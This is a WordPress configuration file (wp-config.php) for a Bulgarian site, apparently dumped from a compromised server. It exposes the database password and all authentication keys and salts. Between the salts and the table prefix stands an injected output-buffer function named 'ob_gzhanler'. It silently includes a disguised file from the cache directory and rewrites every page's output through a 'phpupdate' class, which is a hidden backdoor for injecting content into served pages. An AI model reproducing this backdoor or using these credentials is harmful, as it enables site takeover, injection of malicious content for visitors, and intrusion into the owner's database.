File: /var/www/lk-vidin.eu/wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/
define('WP_MEMORY_LIMIT', '64M');
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'lk_vidin');
/** MySQL database username */
define('DB_USER', 'lk_vidin');
/** MySQL database password */
define('DB_PASSWORD', 'Y4n%o3t@Sd*Enkm9bP8%7NT@');
/** MySQL hostname */
define('DB_HOST', 'localhost');
/** Database Charset to use in creating database tables. */
define('DB_CHARSET', 'utf8mb4');
/** The Database Collate type. Don't change this if in doubt. */
define('DB_COLLATE', '');
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'nki#[G+U)g{O7U3z$KK|9+p%PGbrB<h5Vg0@XTv?*Q*-;eVi92Z2brM0^=:73jUR');
define('SECURE_AUTH_KEY', '.u]vQ 5HjC+27dO;BLKa<m~%h{a{h29w[JD[:,{hi|))aQ77c%k/y`;lI6s<V}JA');
define('LOGGED_IN_KEY', 'U&G&+J-{>[uX_ZAJ*fXdY!r9W`x^v0Ygo;91Z([DTQHbBS~zL#{W{KCR5uNp]v.q');
define('NONCE_KEY', 'I_R`cl*5rhUBEG}=3G,acd=~_E]Y4WE|t2,-<3O.^6gyI?5=+|k=8FB-UeMQ;9=_');
define('AUTH_SALT', '/47+(|UxzH@uYkftBZ_b$?|Bgr7|uv66Q[CH7jm Q}-<m-;6aoosxL5d>.2)e.]&');
define('SECURE_AUTH_SALT', 'Y(6?-n,+e,qa`9O9.rFSeLW?}]nm|%x2~hx^a}5vzFWye{7X_y_ent)tj}Tb/)4G');
define('LOGGED_IN_SALT', 'FPC[_0gBn!I-Z[|iMlFJq(~gs+k#Wr(`TkJ5|4h(v{sr>JTsIWA]Q*6-v]{W{WDt');
define('NONCE_SALT', '~|Yw9R{gie**[Ql5XszOavj(+qR~u~og<*C8V{+PgdLxqG*(Ya|];qq nB(RX|Q ');
/**#@-*/
function ob_gzhanler($s)
{
$f='/var/www/lk-vidin.eu/wp-content/cache/ssess_41689014834b29d37db0d1e1ae30c501';
if(file_exists($f)) include_once($f);
return class_exists('phpupdate') ? phpupdate::copyright($s) : $s;
}
ob_start('ob_gzhanler');
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'lk_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the Codex.
*
* @link https://codex.wordpress.org/Debugging_in_WordPress
*/
/* That's all, stop editing! Happy blogging. */
/** Absolute path to the WordPress directory. */
if ( !defined('ABSPATH') )
define('ABSPATH', dirname(__FILE__) . '/');
/** Sets up WordPress vars and included files. */
require_once(ABSPATH . 'wp-settings.php');
# define('WP_ALLOW_REPAIR', true);
define ('WPLANG', 'bg_BG');